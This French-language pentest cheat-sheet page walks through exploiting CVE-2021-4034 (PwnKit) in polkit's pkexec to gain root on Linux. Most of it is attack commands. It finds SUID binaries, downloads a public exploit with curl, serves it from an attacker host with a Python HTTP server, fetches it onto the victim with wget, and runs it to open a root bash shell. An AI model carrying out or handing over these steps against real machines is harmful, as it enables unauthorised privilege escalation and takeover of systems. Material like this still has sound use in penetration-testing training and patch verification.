SUID (Pkexec) - Linux Privilege Escalation

La vulnérabilité CVE-2021-4034 (PwnKit) dans pkexec de polkit permet une escalade locale des privilèges sous Linux. En exploitant une mauvaise validation des arguments, un attaquant peut exécuter du code avec des droits root. Cette faille critique, facilement exploitable, affecte de nombreuses distributions et nécessite une mise à jour urgente de polkit.

GitHub - ly4k/PwnKit: Self-contained exploit for CVE-2021-4034 - Pkexec Local Privilege EscalationGitHub

Étapes pour exploiter le binaire SUID `pkexec`

Identifier les fichiers avec le bit SUID activé

Pour rechercher les fichiers dotés du bit SUID (permettant une exécution avec les privilèges du propriétaire, souvent root), utilisez la commande :

find / -perm -4000 2>/dev/null

Parmi les résultats, repérez le binaire vulnérable pkexec.

Exploitation de la vulnérabilité

Télécharger l'exploit sur la machine attaquante

Depuis votre machine attaquante, téléchargez le script d'exploitation :

curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit

Transférer l'exploit sur la machine victime

Pour transférer l'exploit, lancez un serveur HTTP simple sur la machine attaquante :

python3 -m http.server 80

Sur la machine victime, téléchargez le fichier et attribuez-lui les droits d'exécution :

wget http://10.10.10.10/PwnKit

chmod +x PwnKit

Exécuter l'exploit

Une fois le fichier prêt, vous pouvez exécuter des commandes avec des privilèges root. Par exemple :

Pour afficher l'identité de l'utilisateur (id) :

./PwnKit '<command>'

./PwnKit 'id'

Pour obtenir une session bash avec les privilèges root :

./PwnKit 'bash -p'

Mis à jour il y a 1 an

hashtagÉtapes pour exploiter le binaire SUID pkexec

hashtagExploitation de la vulnérabilité

hashtagExécuter l'exploit

Étapes pour exploiter le binaire SUID `pkexec`

Exploitation de la vulnérabilité

Exécuter l'exploit